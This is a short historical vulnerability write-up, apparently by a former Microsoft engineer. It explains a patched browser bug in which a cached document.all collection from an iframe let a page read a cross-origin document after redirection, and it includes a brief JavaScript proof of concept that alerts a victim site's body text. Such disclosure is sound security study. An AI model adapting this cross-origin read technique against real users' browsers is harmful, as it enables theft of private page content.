Caching a reference to document.all from a same-origin IFrame before redirecting it to a different domain left a live collection object that still pointed into the new document’s DOM. Accessing properties through that cached collection after the redirect bypassed the same-origin policy.

// IFrame starts on the same origin
var doc_all = window[0].document.all;

// Redirect the IFrame to a different origin
window[0].location = "http://www.victim.com/";

// After the redirect completes:
setTimeout(function() {
    alert(doc_all[0].ownerDocument.body.innerText); // Cross-origin read!
}, 2000);

The HTMLAllCollection object held a reference to the underlying markup that did not get invalidated when the IFrame navigated to a new origin. The ownerDocument chain from any element in the collection led back to the new cross-origin document, from which body content could be read freely.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.